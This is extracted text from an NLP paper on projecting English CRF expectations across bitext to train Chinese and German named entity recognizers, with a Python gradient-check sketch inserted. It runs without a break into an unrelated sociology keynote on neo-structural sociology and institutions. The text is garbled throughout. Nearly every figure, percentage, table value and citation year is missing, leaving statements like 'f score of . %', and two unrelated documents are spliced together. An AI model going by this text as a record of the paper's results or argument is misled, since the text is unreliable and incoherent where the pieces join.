= \sum_{y} p(y \mid x;\theta) \, \phi(y) f(x,y)^{T} - \left( \sum_{y} p(y \mid x;\theta) \phi(y) \right) \left( \sum_{y} p(y \mid x;\theta) f(x,y)^{T} \right)
= \mathrm{Cov}_{p(y \mid x;\theta)}\left( \phi(y), f(x,y) \right)   ( )
= E_{\theta}[\phi f^{T}] - E_{\theta}[\phi] \, E_{\theta}[f^{T}]   ( )

the covariance form above gives the intuition of how optimization works in ge: in each iteration of l-bfgs, the model parameters are updated according to their covariance with the constraint features, scaled by the difference between the current expectation and the target expectation.
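before turning to the dynamic-programming computation discussed next, a brute-force illustration may help make the covariance form of the gradient concrete. the sketch below enumerates every label sequence of a toy chain (feasible only for tiny inputs), computes the ge penalty and its gradient exactly as derived above, and checks the analytic gradient against finite differences. all names and the toy feature set are our assumptions, not the authors' implementation, which obtains eθ[φf^t] with forward-backward-style recursions.

# illustrative python sketch (assumed names; brute force over all label sequences)
import itertools
import numpy as np

def chain_features(y, m):
    """global feature vector of a label sequence: label counts + transition counts.
    (a toy stand-in for f(x, y); the dependence on x is omitted for brevity.)"""
    emit = np.zeros(m)
    trans = np.zeros((m, m))
    prev = None
    for lab in y:
        emit[lab] += 1.0
        if prev is not None:
            trans[prev, lab] += 1.0
        prev = lab
    return np.concatenate([emit, trans.ravel()])

def constraint_features(y, m):
    """phi(y): one bernoulli indicator per (position i, label j) pair, phi_k with k = i*m + j."""
    phi = np.zeros(len(y) * m)
    for i, lab in enumerate(y):
        phi[i * m + lab] = 1.0
    return phi

def ge_penalty_and_grad(theta, phi_target, n, m):
    """return s(e_theta[phi]) = -||phi_target - e_theta[phi]||^2 and its gradient in theta."""
    seqs = list(itertools.product(range(m), repeat=n))          # all label sequences
    F = np.array([chain_features(y, m) for y in seqs])          # shape (S, d)
    Phi = np.array([constraint_features(y, m) for y in seqs])   # shape (S, K)
    scores = F @ theta
    p = np.exp(scores - scores.max())
    p /= p.sum()                                                # p(y | x; theta)
    E_phi = p @ Phi                                             # e_theta[phi],     (K,)
    E_f = p @ F                                                 # e_theta[f],       (d,)
    E_phif = Phi.T @ (p[:, None] * F)                           # e_theta[phi f^T], (K, d)
    cov = E_phif - np.outer(E_phi, E_f)                         # covariance of phi and f
    u = phi_target - E_phi
    penalty = -float(u @ u)                                     # negative squared l2 error
    grad = 2.0 * (u @ cov)                                      # matches the derivation above
    return penalty, grad

# toy usage: n = 3 positions, m = 2 labels, random parameters and target expectations
rng = np.random.default_rng(0)
n, m = 3, 2
theta = rng.normal(size=m + m * m)
phi_target = rng.uniform(size=n * m)
pen, grad = ge_penalty_and_grad(theta, phi_target, n, m)

# finite-difference check of the analytic (covariance-form) gradient
eps = 1e-6
numeric = np.array([(ge_penalty_and_grad(theta + eps * e, phi_target, n, m)[0] - pen) / eps
                    for e in np.eye(len(theta))])
assert np.allclose(numeric, grad, atol=1e-4)

the enumeration over label sequences is of course exponential in sentence length; it is shown only to make the expectations explicit, which is exactly what the dynamic-programming computation below avoids.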
the term eθ[φft ] in eqn. can be com- puted using a dynamic programming (dp) algo- rithm, but solving it directly requires us to store a matrix of the same dimension as ft in each step of the dp. we can reduce the complexity by using the same trick as in (li and eisner, ) for com- puting expectation semiring. the resulting algo- rithm has complexity o(nm ), which is the same as the standard forward-backward inference algorithm for crf. (druck, , ) gives full details of this derivation. . hard vs. soft projection projecting expectations instead of one-best label as- signments from english to foreign language can be thought of as a soft version of the method de- scribed in (das and petrov, ) and (ganchev et al., ). soft projection has its advantage: when the english model is not certain about its predic- tions, we do not have to commit to the current best prediction. the foreign model has more freedom to form its own belief since any marginal distribu- tion it produces would deviates from a flat distri- bution by just about the same amount. in general, preserving uncertainties till later is a strategy that has benefited many nlp tasks (finkel et al., ). hard projection can also be treated as a special case in our framework. we can simply recalibrate pos- terior marginal of english by assigning probability mass to the most likely outcome, and zero ev- erything else out, effectively taking the argmax of the marginal at each word position. we refer to this version of expectation as the “hard” expecta- tion. in the hard projection setting, ge training re- sembles a “project-then-train” style semi-supervised crf training scheme (yarowsky and ngai, ; täckström et al., ). in such a training scheme, we project the one-best predictions of english crf to the foreign side through word alignments, then in- clude the newly “tagged” foreign data as additional training data to a standard crf in the foreign lan- guage. rather than projecting labels on a per-word basis, yarowsky and ngai ( ) also explored an alternative method for noun-phrase (np) bracketing task that amounts to projecting the spans of nps based on the observation that individual nps tend to retain their sequential spans across translations. we experimented with the same method for ner, but found that this method of projecting the ne spans does not help in reducing noise and actually lowers model performance. besides the difference in projecting expecta- tions rather than hard labels, our method and the “project-then-train” scheme also differ by optimiz- ing different objectives: crf optimizes maximum conditional likelihood of the observed label se- quence, whereas ge minimizes squared error be- tween model’s expectation and “hard” expectation based on the observed label sequence. in the case where squared error loss is replaced with a kl- divergence loss, ge has the same effect as marginal- izing out all positions with unknown projected la- bels, allowing more robust learning of uncertainties in the model. as we will show in the experimen- o per loc org gpe o per loc org gpe o per loc org misc o per loc org misc table : raw counts in the error confusion matrix of english crf models. top table contains the counts on ontonotes test data, and bottom table contains conll- test data counts. rows are the true la- bels and columns are the observed labels. for exam- ple, item at row , column of the top table reads: we observed times where the true label should be person, but english crf model output label lo- cation. tal results in section . 
, soft projection in combi- nation of the ge objective significantly outperforms the project-then-train style crf training scheme. . source-side noise an additional source of noise comes from errors generated by the source-side english crf mod- els. we know that the english crf models gives f score of . % on the ontonotes dataset for english-chinese experiment, and . % on the conll- dataset for english-german experiment. we present a simple way of modeling english-side noise by picturing the following process: the la- bels assigned by the english crf model (denoted as y) are some noised version of the true labels (de- noted as y∗). we can recover the probability of the true labels by marginalizing over the observed la- bels: p(y∗|x) = ∑ y p(y ∗|y)∗p(y|x). p(y|x) is the posterior probabilities given by the crf model, and we can approximate p(y∗|y) by the column- normalized error confusion matrix shown in table . this source-side noise model is likely to be overly simplistic. generally speaking, we could build much more sophisticated noising model for the source- side, possibly conditioning on context, or capturing higher-order label sequences. experiments we conduct experiments on chinese and german ner. we evaluate cliper in two learning set- tings: weakly supervised and semi-supervised. in the weakly supervised setting, we simulate the con- dition of having no labeled training data, and evalu- ate the model learned from bitext alone. we then vary the amount of labeled data available to the model, and examine the model’s learning curve. in the semi-supervised setting, we assume our model has access to the full labeled data; our goal is to improve performance of the supervised method by learning from additional bitext. . dataset and setup we used the latest version of stanford ner toolkit as our base crf model in all experiments. fea- tures for english, chinese and german crfs are documented extensively in (che et al., ) and (faruqui and padó, ) and omitted here for brevity. it it worth noting that the current stan- ford ner models include recent improvements from semi-supervise learning approaches that induces dis- tributional similarity features from large word clus- ters. these models represent the current state-of- the-art in supervised methods, and serve as a very strong baseline. for chinese ner experiments, we follow the same setup as che et al. ( ) to evaluate on the latest ontonotes (v . ) corpus (hovy et al., ). a total of , sentences from the parallel chinese and english penn treebank portion are reserved for evaluation. odd-numbered documents are used as development set, and even-numbered documents are held out as blind test set. the rest of ontonotes annotated with ner tags are used to train the en- glish and chinese crf base taggers. there are about k and k labeled sentences for chinese and english training, respectively. the english crf tag- ger trained on this training corpus gives f score of . % on the ontonotes test set. four enti- ties types are used for both chinese and english with a io tagging scheme. the english-chinese http://www-nlp.stanford.edu/ner ldc catalogue no.: ldc t file numbers: chtb - , ectb - person, location, organization and gpe. we did not adopt the commonly seen bio tagging scheme bitext comes from the foreign broadcast informa- tion service corpus (fbis). we randomly sampled k parallel sentence pairs to use as bitext in our experiments. it is first sentence aligned using the champollion tool kit, then word aligned with the berkeleyaligner. 
for german ner experiments, we evaluate us- ing the standard conll- ner corpus (sang and meulder, ). the labeled training set has k and k sentences, containing four entity types. an english crf model is also trained on the conll- english data with the same entity types. for bi- text, we used a randomly sampled set of k parallel sentences from the de-en portion of the news com- mentary dataset. the english crf tagger trained on conll- english training corpus gives f score of . % on the conll- test set. we report typed entity precision (p), recall (r) and f score. statistical significance tests are done using a paired bootstrap resampling method with iterations, averaged over runs. we com- pare against three recently approaches that were in- troduced in section . they are: semi-supervised learning method using factored bilingual models with gibbs sampling (wang et al., a); bilin- gual ner using integer linear programming (ilp) with bilingual constraints, by (che et al., ); and constraint-driven bilingual-reranking approach (burkett et al., ). the code from (che et al., ) and (wang et al., a) are publicly avail- able. code from (burkett et al., ) is obtained through personal communications. since the objective function in eqn. is non- convex, we adopted the early stopping training scheme from (turian et al., ) as the following: after each iteration in l-bfgs training, the model (ramshaw and marcus, ), because when projected across swapping word alignments, the “b-” and “i-” tag distinction may not be well-preserved and may introduce additional noise. the fbis corpus is a collection of radio news casts and contains translations of openly available news and information from media sources outside the united states. the ldc cata- logue no. is ldc e . champollion.sourceforge.net code.google.com/p/berkeleyaligner person, location, organization and miscella- neous. http://www.statmt.org/wmt / training-parallel-nc-v .tgz https://github.com/stanfordnlp/corenlp is evaluated against the development set; the train- ing procedure is terminated if no improvements have been made in iterations. . weakly supervised results figure a and b show results of weakly supervised learning experiments. quite remarkably, on chinese test set, our proposed method (cliper) achieves a f score of . % with k bitext, when no labeled training data is used. in contrast, the supervised crf baseline would require as much as k labeled sentences to attain the same accuracy. results on the german test set is less striking. with no labeled data and k of bitext, cliper performs at f of . %, the equivalent of using . k labeled examples in the supervised setting. when combined with k labeled examples, performance of cliper reaches %, a gain of over % absolute over supervised crf. we also notice that supervised crf model learns much faster in german than chinese. this result is not too surprising, since it is well recognized that chinese ner is more challenging than german or english. the best supervised results for chinese is - % (f score) behind best german and english super- vised results. chinese ner relies more on lexical- ized features, and therefore needs more labeled data to achieve good coverage. the results suggest that cliper seems to be very effective at transferring lexical knowledge from english to chinese. figure c and d compares soft ge projection with hard ge projection and the “project-then-train” style crf training scheme (cf. section . ). 
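the source-side noise model described above (recovering p(y*|x) by marginalizing the english tagger's posteriors through the column-normalized error confusion matrix) can be sketched as follows. the array names and shapes are our assumptions, not the paper's; the resulting denoised marginals would then be projected across word alignments exactly as before.

# illustrative python sketch (assumed names) of p(y*|x) = sum_y p(y*|y) p(y|x)
import numpy as np

def column_normalized(confusion):
    """confusion[i, j] = count of (true label i, observed label j); normalize each column."""
    col_sums = confusion.sum(axis=0, keepdims=True)
    return confusion / np.maximum(col_sums, 1e-12)

def denoise_marginals(en_marginals, confusion):
    """
    en_marginals: (n_tokens, n_labels) posteriors p(y | x) from the english crf.
    confusion:    (n_labels, n_labels) raw error counts, rows = true labels, columns = observed labels.
    returns (n_tokens, n_labels) estimates of p(y* | x).
    """
    p_true_given_pred = column_normalized(confusion)  # approximates p(y* | y)
    return en_marginals @ p_true_given_pred.T         # marginalize over the observed label y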
we observe that both soft and hard ge projection sig- nificantly outperform the “project-then-train” style training scheme. the difference is especially pro- nounced on the chinese results when fewer labeled examples are available. soft projection gives better accuracy than hard projection when no labeled data is available, and also has a faster learning rate. incorporating source-side noise using the method described in section . gives a small improvement on chinese with supervised data, increasing f score from . % to . %. this improvement is statis- tically significant at % confidence interval. how- ever, on the german data, we observe a tiny de- crease with no statistical significance in f score, dropping from . % to . %. a likely ex- planation of the difference is that the english crf model in the english-chinese experiment, which is trained on ontonotes data, has a much higher error rate ( . %) than the english crf model in the english-german experiment trained on conll- ( . %). therefore, modeling noise in the english- chinese case is likely to have a greater effect than the english-german case. . semi-supervised results in the semi-supervised experiments, we let the crf model use the full set of labeled examples in addi- tion to the unlabeled bitext. results on the test set are shown in table . all semi-supervised baselines are tested with the same number of unlabeled bitext as cliper in each language. the “project-then- train” semi-supervised training scheme severely hurts performance on chinese, but gives a small im- provement on german. moreover, on chinese it learns to achieve high precision but at a significant loss in recall. on german its behavior is the oppo- site. such drastic and erratic imbalance suggest that this method is not robust or reliable. the other three semi-supervised baselines (row - ) all show im- provements over the crf baseline, consistent with their reported results. clipers gives the best re- sults on both chinese and german, yielding statis- tically significant improvements over all baselines except for cwd on german. the hard projection version of cliper also gives sizable gain over crf. however, in comparison, clipers is superior. the improvements of clipers over crf on chinese test set is over . % in absolute f . the improvement over crf on german is almost a per- cent. to our knowledge, these are the best reported numbers on the ontonotes chinese and conll- german datasets. . efficiency another advantage of our proposed approach is ef- ficiency. because we eliminated the previous multi- stage “uptraining” paradigm, but instead integrating the semi-supervised and supervised objective into one joint objective, we are able to attain signifi- cant speed improvements over all methods except crfptt. table shows the required training time. # of labeled training sentences [k] f sc or e [% ] supervised crf clipper soft (a) chinese test # of labeled training sentences [k] f sc or e [% ] supervised crf clipper soft (b) german test # of labeled training sentences [k] f sc or e [% ] crf projection clipper hard clipper soft (c) soft vs. hard on chinese test # of labeled training sentences [k] f sc or e [% ] crf projection clipper hard clipper soft (d) soft vs. 
hard on german test [高岗] 纪念碑 在 [横山] 落成 a monument commemorating [vice president gao gangper ] was completed in [hengshanloc ] (e) word proceeding “monument” is person [碛口] [毛主席] 东渡 [黄河] 纪念碑 简介 introduction of [qikouloc ] [chairman maoper ] [yellow riverloc ] crossing monument (f) word proceeding “monument” is location figure : top four figures show performance curves of cliper with varying amounts of available labeled training data in a weakly supervised setting. vertical axes show the f score on the test set. performance curves of supervised crf and “project-then-train” crf are plotted for comparison. bottom two figures are examples of aligned sentence pairs in chinese and english. chinese german p r f p r f crf . . . . . . crfptt . . . . . . bpbk . . . . . . cwd . . . . . . wcd a . . . . . . wcd b . . . . . . cliperh . . . §‡ . . . ∗ clipers . . . §†? �∗ . . . ‡? ∗§ table : test set chinese, german ner results. best number of each column is highlighted in bold. crf is the supervised baseline. crfptt is the “project-then-train” semi-supervised scheme for crf. bpbk is (burkett et al., ), wcd is (wang et al., a), cwd a is (che et al., ), and wcd b is (wang et al., b) . clipers and cliperh are the soft and hard projections. § indicates f scores that are statistically significantly better than crf baseline at . % confidence level; ? marks significance over crfptt with . % con- fidence; † and ‡ marks significance over wcd with . % and % confidence; and � marks sig- nificance over cwd with . % confidence; ∗ marks significance over bpbk with . % con- fidence. discussions figure e and f give two examples of cross-lingual projection methods in action. both examples have a named entity that immediately proceeds the word “纪念碑” (monument) in the chinese sentence. in figure e, the word “高岗” has literal meaning of a hillock located at a high position, which also hap- pens to be the name of a former vice president of china. without having previously observed this word as a person name in the labeled training data, the crf model does not have enough evidence to believe that this is a person, instead of location. but the aligned words in english (“gao gang”) are clearly part of a person name as they were pre- ceded by a title (“vice president”). the english model has high expectation that the aligned chi- nese word of ”gao gang” is also a person. there- fore, projecting the english expectations to chinese provides a strong clue to help disambiguating this word. figure f gives another example: the word “黄河”(huang he, the yellow river of china) can chinese german crf m s m s crfptt m s m s wcd h m h m cwd a h m h m cwd b h m h m bpbk h m h m cliperh h m m s clipers h m m s table : timing stats during model training. be confused with a person name since “黄”(huang or hwang) is also a common chinese last name. . again, knowing the translation in english, which has the indicative word “river” in it, helps disam- biguation. the crfptt and cliperh methods successfully labeled these two examples correctly, but failed to produce the correct label for the example in fig- ure . on the other hand, a model trained with the clipers method does correctly label both entities in figure , demonstrating the merits of the soft pro- jection method. conclusion we introduced a domain and language independent semi-supervised method for training discriminative models by projecting expectations across bitext. 
ex- periments on chinese and german ner show that our method, learned over bitext alone, can rival per- formance of supervised models trained with thou- sands of labeled examples. furthermore, applying our method in a setting where all labeled examples are available also shows improvements over state-of- the-art supervised methods. our experiments also showed that soft expectation projection is more fa- vorable to hard projection. this technique can be generalized to all sequence labeling tasks, and can be extended to include more complex constraints. for future work, we plan to apply this method to more language pairs and also explore data selection strategies and modeling alignment uncertainties. in fact, a people search of the name 黄河 on the most pop- ular chinese social network (renren.com) returns over , matches. acknowledgments the authors would like to thank jennifer gillenwa- ter for a discussion that inspired this work, behrang mohit and nathan schneider for their help with the arabic ner data, and david burkett for providing the source code of their work for comparison. we would also like to thank editor lillian lee and the three anonymous reviewers for their valuable com- ments and suggestions. we gratefully acknowledge the support of the u.s. defense advanced research projects agency (darpa) broad operational lan- guage translation (bolt) program through ibm. any opinions, findings, and conclusion or recom- mendations expressed in this material are those of the authors and do not necessarily reflect the view of darpa, or the us government. references hiyan alshawi, srinivas bangalore, and shona douglas. . head-transducer models for speech translation and their automatic acquisition from bilingual data. machine translation, . rie kubota ando and tong zhang. . a high- performance semi-supervised learning method for text chunking. in proceedings of acl. kedar bellare, gregory druck, and andrew mccallum. . alternating projections for learning with expec- tation constraints. in proceedings of uai. avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in proceed- ings of colt. david burkett and dan klein. . two languages are better than one (for syntactic parsing). in proceedings of emnlp. david burkett, slav petrov, john blitzer, and dan klein. . learning better monolingual models with unan- notated bilingual text. in proceedings of conll. andrew carlson, justin betteridge, richard c. wang, es- tevam r. hruschka jr., and tom m. mitchell. . coupled semi-supervised learning for information ex- traction. in proceedings of wsdm. ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in proceedings of acl. wanxiang che, mengqiu wang, and christopher d. man- ning. . named entity recognition with bilingual constraints. in proceedings of naacl. michael collins and yoram singer. . unsupervised models for named entity classification. in proceedings of emnlp. dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of acl. gregory druck and andrew mccallum. . high- performance semi-supervised learning using discrim- inatively constrained generative models. in proceed- ings of icml. gregory druck, gideon mann, and andrew mccallum. . leveraging existing resources using generalized expectation criteria. in proceedings of nips workshop on learning problem design. gregory druck, burr settles, and andrew mccallum. . 
active learning by labeling features. in pro- ceedings of emnlp. gregory druck. . generalized expectation criteria for lightly supervised learning. ph.d. thesis, univer- sity of massachusetts amherst. manaal faruqui and sebastian padó. . training and evaluating a german named entity recognizer with se- mantic generalization. in proceedings of konvens. jenny rose finkel, christopher d. manning, and an- drew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. in proceedings of emnlp. victoria fossum and steven abney. . automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. in proceedings of ijcnlp. kuzman ganchev and dipanjan das. . cross- lingual discriminative learning of sequence models with posterior regularization. in proceedings of emnlp. kuzman ganchev, jennifer gillenwater, and ben taskar. . dependency grammar induction via bitext pro- jection constraints. in proceedings of acl. kuzman ganchev, jo ao graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. jmlr, : – . andrew b. goldberg. . new directions in semi- supervised learning. ph.d. thesis, university of wisconsin-madison. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of naacl-hlt. dan klein. . the unsupervised learning of natural language structure. ph.d. thesis, stanford univer- sity. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilis- tic models for segmenting and labeling sequence data. in proceedings of icml. zhifei li and jason eisner. . first- and second-order expectation semirings with applications to minimum- risk training on translation forests. in proceedings of emnlp. shen li, jo ao graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in proceedings of emnlp-conll. percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. gideon mann and andrew mccallum. . general- ized expectation criteria for semi-supervised learning with weakly labeled data. jmlr, : – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in proceed- ings of naacl-hlt. tahira naseem, benjamin snyder, jacob eisenstein, and regina barzilay. . multilingual part-of- speech tagging: two unsupervised approaches. jair, : – . slav petrov, pi-chuan chang, michael ringgaard, and hiyan alshawi. . uptraining for accurate deter- ministic question parsing. in proceedings of emnlp. lance a. ramshaw and mitchell p. marcus. . text chunking using transformation-based learning. natu- ral language processing using very large corpora, : – . rajhans samdani, ming-wei chang, and dan roth. . unified expectation maximization. in proceed- ings of naacl. erik f. tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in proceedings of conll. vikas sindhwani, partha niyogi, and mikhail belkin. . a co-regularization approach to semi- supervised learning with multiple views. in proceed- ings of icml workshop on learning with multiple views, international conference on machine learn- ing. noah a. smith. . novel estimation methods for unsupervised discovery of latent structure in natu- ral language text. ph.d. thesis, johns hopkins uni- versity. 
benjamin snyder, tahira naseem, and regina barzilay. . unsupervised multilingual grammar induction. in proceedings of acl. jun suzuki and hideki isozaki. . semi-supervised sequential labeling and segmentation using giga-word scale unlabeled data. in proceedings of acl. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. in proceedings of acl. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl. mengqiu wang, wanxiang che, and christopher d. man- ning. a. effective bilingual constraints for semi- supervised learning of named entity recognizers. in proceedings of aaai. mengqiu wang, wanxiang che, and christopher d. man- ning. b. joint word alignment and bilingual named entity recognition using dual decomposition. in proceedings of acl. chenhai xi and rebecca hwa. . a backoff model for bootstrapping resources for non-english languages. in proceedings of hlt-emnlp. david yarowsky and grace ngai. . inducing mul- tilingual pos taggers and np bracketers via robust projection across aligned corpora. in proceedings of naacl. david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of acl. microsoft word - volume _final insna.org | issues & | volume | networks and institutionalization: a neo-structural approach emmanuel lazega institut d’etudes politiques de paris, france centre de sociologie des organisations – cnrs eusn mainz keynote address for connections revised dec abstract this paper is the text prepared for the keynote address of the eusn conference in mainz, germany. a short presentation of concepts reflects in part the foundations of neo- structural sociology (nss) and its use of social and organisational network analyses, com- bined with other methodologies, to better understand the roles of structure and culture in indi- vidual and collective agency. the presentation shows how nss accounts for institutional change by focusing on the importance of combined relational infrastructures and rhetorics. specific characteristics of institutional entrepreneurs who punch above their weight in institu- tionalization processes are introduced for that purpose, particularly the importance of multi- status oligarchs, status heterogeneity, high-status inconsistencies, collegial oligarchies, con- flicts of interests and rhetorics of relative/false sacrifice. two empirical examples illustrate this approach. the first case focuses on a network study of the commercial court of paris, a -year-old judicial institution. the second case focuses on a network study of a field- configuring event (the so-called venice forum) lobbying for the emergence of a new europe- an jurisdiction, the unified patent court, and its attempt to create a common intellectual prop- erty regime for the continent. for sociologists, both examples involve “studying up”: they are cases of public/private joint regulation of markets bringing together these ingredients of insti- tutionalization. the conclusion suggests future lines of research that nss opens for the study of institutionalization, in particular using the dynamics of multi-level networks. one of the main issues raised by this approach is its contribution to the study of democratic deficits in a period of intense institutional change in europe. 
author emmanuel lazega is professor of sociology at the institut d’etudes politiques de paris and a membre of the centre de sociologie des organisations (cnrs). his current research projects focus on the dynamics of multi-level networks in organizations and markets, with a special focus on network modelling of social processes helping actors in such settings manage the dilemmas of their collective action (contemporary forms of solidarity, social control, learning and regulation). he is the author and co-editor of several books (for example the collegial phenomenon, oxford university press; micropolitics of knowledge, aldine-de gruyter; conventions and structures in economic organization, edited with olivier favereau, edward elgar publishing; multilevel network analysis for the social sciences, edited with tom a.b. snijders, springer; knowledge and networks, edited with johannes glückler and ingmar hammer). his publications can be downloaded from http://www.elazega.fr. i would like to thank the committees of eusn , particularly marina hennig, for the invitation to present this keynote address. connections networks and institutionalization | volume | issues & | insna.org introduction the outline of this address is the following. it will first briefly present a few concepts that belong to the foundations of neo- structural sociology (nss) (for a synthesis, see lazega, , a). the purpose of this sociology is to use social and organi- zational network analyses, combined with other methodologies, to better understand the roles of structure and culture in the processes of collective agency. it will then look at how nss contributes to under- standing institutional change as collective agency by focusing on the importance of relational infrastructures and rhetorics. it will next identify specific characteristics of institutional entrepreneurs who punch above their weight in institutionalization processes: the importance of high-status inconsistencies, collegial oligarchies, mul- ti-status oligarchs, conflicts of interests and rhetorics is hereby introduced. two empir- ical examples will be provided to illustrate this approach. for the sociologist, both ex- amples involve ‘studying up’: they are cas- es of public/private joint regulation of markets looking at these elements of insti- tutionalization. the first case focuses on the commercial court of paris, a -year- old judicial institution. the second case focuses on the emerging european unified patent court. the conclusion suggests fu- ture lines of research that nss opens up based on the study of institutionalization, in particular in the dynamics of multi-level networks. one of the main issues raised by this approach is that of democratic deficits in a period of intense institutional change in europe. foundations of neo-structural sociology neo-structural sociology brings together, very generally, structure, culture and ac- tion (both individual and collective action) in the organizational society. it relies on sophisticated analyses of socio- organizational networks, if possible multi- level and dynamic, and enriched with data on culture and behavior . the focus is on collective action, and especially on model- ling its generic social processes (learning and socialization, particularistic solidarity and discriminations, social control and conflict resolution, regulation and institu- tionalization). 
to theorize and model these processes, it is important to use the notion of relational infrastructures of collective action, particularly of collective action that relies on personalized ties between peers for coordination, elsewhere called collegi- ality . in order to frame the issue theoreti- cally, relationships, as indicators of inter- dependencies, are defined as both channels for resources with, and symbolic or moral commitments to, exchange partners. it is because relationships have both dimen- sions that they can become infrastructural. indeed, stabilized relationships are usually part of structures that are identified locally, in the entourage of the actors, as relational sub-structures with which we are all famil- iar, such as direct reciprocity, indirect reci- procity, transitivity, etc.; but also part of what can be called relational infrastruc- tures, such as vertical patterns of differen- tiations (mainly heterogeneous forms of status coexisting in complex ways) and horizontal patterns of differentiations (mainly social niches in a system of nich- es) at a morphological level. in particular, relational infrastructures combined with norms facilitate generic social processes helping members manage the dilemmas of their collective actions. using combina- contemporary neo-structuralism is different from the structuralism of claude lévi- strauss and of the s mainly because it relies on a theory of individual and collective action to provide a new fundamental link between structure and process. the articulation between culture and structure, however, was already present in the ‘old’ structuralism. this also means that understanding collec- tive action in ideal, typically speaking bu- reaucratized settings, based on routines, hie- rarchy and impersonal ties, does not need much social network analysis. networks and institutionalization connections insna.org | issues & | volume | tions of relational infrastructures and rela- tional sub-structures in social and organi- zational networks, we have modelled sev- eral generic processes , such as solidarities with direct and indirect reciprocity in vari- ous multiplex networks; social control in lateral control regimes using personal rela- tionships for collective goals; collective learning with various kinds of advice seek- ing networks; and regulation and institu- tionalization as political processes, that are the focus of this talk. thus, nss reframes the recursive dynamics of social structure and social processes. a focus on relational infrastructures in institutionalization processes institutions are commonly and broadly de- fined as rules, norms, and beliefs that de- scribe reality for actors, explaining what is and is not, what can be acted upon and what cannot, and how (hall & taylor, ; hoffman, ; scott, ; bathelt & glückler, ). the focus is on the norms, mutual expectations and beliefs about issues and the legitimate organiza- tional ways in which related behavior has to be normed and governed. a classical question in the social sciences is: ‘how do such institutions emerge?’ our work in this area owes much to collaboration, initiated by harrison white in , with institu- tional economists, in particular olivier fa- vereau (see favereau and lazega, ; lazega a). 
in the era of ‘governance’ (weakening of command and control framework of states) that we witnessed over the last decades, this neo-structural sociology has blossomed in economic so- ciology, by focusing on collective action in joint (public authorities and private actors, including business) regulation of markets. since , nss has owed much to julien neo-structural publications about these pro- cesses including theoretical, empirical and methodological work developing a neo- structural theory of institutionalization are available online: www.elazega.fr > http://elazega.fr/?m= brailly, catherine comet, fabien eloire, guillaume favre, lise mounier, jaime montes-lihn, mohamed oubenal, elise penalva-icher, alvaro pina-stranger, tom snijders, paola tubaro, marta varanda, and many others. contemporary thinking about the emergence of institutions is dominated in sociology by a variety of neo-institutional perspectives focusing on ‘institutional en- trepreneurs’ (dimaggio, ) who elabo- rate on taken-for-granted cultural catego- ries, classifications, rules and procedures that include beliefs and codes stabilizing action into routines. in this literature, struc- tural dimensions of regulation are largely ignored. yet in his work on what he calls ‘precarious values’, selznick ( ) al- ready provides an early combination of a structural and an institutional perspective in sociology. a precarious value is one that is essential to the viability of the collectivi- ty but in which most members may have no direct stake. in this illustration of the entanglement of structure and culture, a value is therefore precarious because it is always in danger of losing its flag carriers and representatives, that is, the active sup- port by organized interest groups and elites that helps preserve it as a candidate for priority on the list of all competing values. we argue that, in organizational so- cieties (perrow, ), where power is ex- tremely concentrated, this relational and cultural perspective enriches the study of institutionalization processes by focusing on their often collegial, elitist and person- alized nature. in this process, the selection of priority norms and the personalized se- lection of the authorities who champion them is an important process in the crea- tion of frames of reference that become taken for granted over time, and thus insti- tutionalized. therefore, the creation of an oligarchy of actors, who are able to guide the regulatory process and to mobilize fol- lowers by helping them align with new rules, are key underlying mechanisms that belong to the institutionalization process as theorized by selznick and encapsulated in his notion of precarious values. connections networks and institutionalization | volume | issues & | insna.org today the focus is on the process of regulation and institutionalization. there is something remarkable in the way relational infrastructures are mobilized in political, regulatory, institution building processes: their efficiency comes from the constitu- tion of collegial oligarchies whose mem- bers take advantage of situations of con- flicts of interests to concentrate power (lazega, b). high-status inconsistencies and conflicts of interests: punching above their weight in institutionalization process we are not equal in our capacity to defend our regulatory interests, even in egalitarian systems. 
very generally speaking, neo-structural sociology starts with the principle that divergent interests and forced interdependencies complexify the regulatory process and the development of institutions. it requires an understanding of interdependencies as relational infrastructures that are often conflictual, dynamic and multi-level. modelling social processes in terms of networks adds much to the reflection on the way individual and collective agents defend their regulatory interests in institutionalization processes, and therefore to joint regulation as a social and political process. selznick's connection between structure and culture is still illuminating today with respect to understanding institution building by small networks of top-level institutional entrepreneurs that we call collegial oligarchies. at a very high level of generality, defining norms for collective action, i.e. the political process in a collectivity, depends upon who the actors promoting these rules are, what their strategies are to carry out this regulation within the system of their interdependencies, and what relational infrastructures they are able to create and mobilize to do that. in this spirit, neo-structural sociology looks at institution building by exploring the relational dimension of 'institutional work' (lawrence, suddaby and leca, ) or political work (lahille, ; christopoulos and ingold, ), i.e. at the system of interdependencies in collegial oligarchies of institutional entrepreneurs involved in institutional framing.

in particular, the neo-structural approach to regulatory activity reveals the ways in which strategic agents politicise their exchanges, especially by building relational infrastructures, for example, social niches or forms of social status. controlling those relational infrastructures gives them a structural position that enables them to frame or guide the negotiation of rules, including building forms of consensus and normative alignments that are more or less long lasting. observing the inconsistencies between these forms of status proves to be a powerful tool in the analysis of the regulatory process. (footnote: these inconsistencies are also the reason for difficulties in properly specifying status in statistical network models (lazega, mounier, snijders and tubaro, ).)

